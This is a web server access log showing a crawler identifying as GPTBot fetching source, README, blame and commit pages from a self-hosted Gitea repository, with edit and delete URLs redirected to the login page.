"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py?display=source" [Client 74.7.227.38] [Length 11803] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" -[17/Feb/2026:17:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17356] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17357] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12559] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 11969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py?display=source" [Client 74.7.227.38] [Length 29776] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" -[17/Feb/2026:17:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21440] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21443] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md?display=source" [Client 74.7.227.38] [Length 20626] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" -[17/Feb/2026:17:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" -[17/Feb/2026:17:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md?display=source" [Client 74.7.227.38] [Length 19996] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11017] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" -[17/Feb/2026:17:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py?display=source" [Client 74.7.227.38] [Length 11770] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" -[17/Feb/2026:17:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12557] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" -[17/Feb/2026:17:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 10993] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" -[17/Feb/2026:17:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12558] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" -[17/Feb/2026:17:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" -[17/Feb/2026:17:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21439] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py?display=source" [Client 74.7.227.38] [Length 29744] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" -[17/Feb/2026:17:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" -[17/Feb/2026:17:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" -[17/Feb/2026:17:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17329] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21438] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14317] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:17:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11668] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9792] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 30374] [Gzip 8.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23279] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old" [Client 74.7.227.38] [Length 42648] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 11183] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14666] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:24:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:24:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 11004] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:24:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" 